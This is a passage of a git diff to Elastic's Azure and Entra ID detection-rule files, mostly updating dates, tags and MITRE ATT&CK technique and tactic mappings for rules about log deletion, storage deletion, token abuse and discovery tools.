"1e0b832e-957e-43ae-b319-db82d228c908" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,34 +78,18 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique.subtechnique]] -id = "T1552.005" -name = "Cloud Instance Metadata API" -reference = "https://attack.mitre.org/techniques/T1552/005/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml index d9817465e01..663788378b1 100644 --- a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml +++ b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "8ddab73b-3d15-4e5d-9413-47f05553c1d7" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -76,8 +76,25 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml index 7f1c35aedb6..aec440c0508 100644 --- a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml +++ b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,27 +84,21 @@ event.dataset:azure.activitylogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml index 76a3d0239cb..4e60e6ae26d 100644 --- a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +++ b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -80,19 +80,13 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml index 0acbfc2f754..9c69e71409e 100644 --- a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml +++ b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,23 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml index 5421c5675f8..8ef3beefa07 100644 --- a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml +++ b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/27" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -81,14 +81,18 @@ event.outcome: "success" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml index dcdc2b1b80e..a537e8045fc 100644 --- a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml +++ b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/03" integration = ["azure", "o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,36 +118,27 @@ any where event.dataset : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.003" name = "Cloud Groups" reference = "https://attack.mitre.org/techniques/T1069/003/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" - -[[rule.threat.technique]] -id = "T1201" -name = "Password Policy Discovery" -reference = "https://attack.mitre.org/techniques/T1201/" - [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -158,14 +149,7 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" -[[rule.threat.technique]] -id = "T1673" -name = "Virtual Machine Discovery" -reference = "https://attack.mitre.org/techniques/T1673/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml index d8c4b0c0ae9..34fc96dc32c 100644 --- a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml +++ b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/02" integration = ["azure", "o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,18 +79,7 @@ references = [ risk_score = 47 rule_id = "f541ca3a-5752-11f0-b44b-f661ea17fbcd" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Azure", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -103,71 +92,46 @@ event.dataset:("azure.signinlogs" or "o365.audit") [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.003" name = "Cloud Groups" reference = "https://attack.mitre.org/techniques/T1069/003/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" - -[[rule.threat.technique]] -id = "T1201" -name = "Password Policy Discovery" -reference = "https://attack.mitre.org/techniques/T1201/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat.technique]] -id = "T1673" -name = "Virtual Machine Discovery" -reference = "https://attack.mitre.org/techniques/T1673/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml index f39b0218f9a..36e63b171e3 100644 --- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml +++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ references = ["https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-re risk_score = 21 rule_id = "2636aa6c-88b5-4337-9c31-8d0192a8ef45" severity = "low" -tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Asset Visibility", "Tactic: Discovery", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Asset Visibility", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -75,38 +75,13 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1619" -name = "Cloud Storage Object Discovery" -reference = "https://attack.mitre.org/techniques/T1619/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml index ca5229f3624..0a1058aa6b4 100644 --- a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml +++ b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/02" integration = ["azure"] maturity = "production" -updated_date = "2025/10/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -71,16 +71,7 @@ To ensure this rule functions correctly, the following diagnostic logs must be e - StorageRead: This log captures all read operations performed on blobs in the storage account, including GetBlob operations. These logs should be streamed to the Event Hub used for the Azure integration configuration. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Storage", - "Data Source: Azure", - "Data Source: Azure Platform Logs", - "Data Source: Azure Storage", - "Use Case: Threat Detection", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Storage", "Tactic: Collection", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Storage", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -95,22 +86,16 @@ event.dataset: azure.platformlogs and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" - +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["azure.platformlogs.properties.accountName"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml index be0e1e3a0ca..c9a25709e1b 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml +++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/10" integration = ["azure"] maturity = "production" -updated_date = "2025/10/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,22 +106,16 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name", "azure.resource.group"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml index 6592f3dc246..59ba9cdf06c 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml +++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/10" integration = ["azure"] maturity = "production" -updated_date = "2025/10/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,22 +110,16 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.threshold] field = ["azure.activitylogs.identity.claims_initiated_by_user.name"] value = 1 diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion.toml b/rules/integrations/azure/impact_azure_storage_account_deletion.toml index 880e9a87e2f..aff443ad71c 100644 --- a/rules/integrations/azure/impact_azure_storage_account_deletion.toml +++ b/rules/integrations/azure/impact_azure_storage_account_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/08" integration = ["azure"] maturity = "production" -updated_date = "2025/10/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,22 +86,16 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" -[[rule.threat.technique]] -id = "T1489" -name = "Service Stop" -reference = "https://attack.mitre.org/techniques/T1489/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml index b3ce7ddb0c8..b35f1bf641c 100644 --- a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml +++ b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/08" integration = ["azure"] maturity = "production" -updated_date = "2025/10/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,22 +90,16 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" -[[rule.threat.technique]] -id = "T1489" -name = "Service Stop" -reference = "https://attack.mitre.org/techniques/T1489/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.threshold] field = ["azure.activitylogs.identity.claims_initiated_by_user.name"] value = 1 diff --git a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml index 8388ea6ebe5..860bd202ab1 100644 --- a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml +++ b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,14 +78,6 @@ event.dataset: "azure.activitylogs" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml index e1be4f4ec17..31098219fe4 100644 --- a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml +++ b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -78,19 +78,13 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" -[[rule.threat.technique]] -id = "T1529" -name = "System Shutdown/Reboot" -reference = "https://attack.mitre.org/techniques/T1529/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml index a28f3b45431..86099be4468 100644 --- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml +++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,31 +80,13 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml index e394d39c999..48d7a122d65 100644 --- a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml +++ b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,39 +89,39 @@ event.dataset: "azure.activitylogs" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml index 1ef19b65dbd..507a7129a7e 100644 --- a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml +++ b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,18 +65,7 @@ references = [ risk_score = 47 rule_id = "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra Audit Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -106,31 +95,18 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml index 9ea2a42f57b..9568883df81 100644 --- a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,14 +25,7 @@ setup = """ This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,19 +76,30 @@ Entra ID Device Code Authentication allows users to authenticate devices using a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" 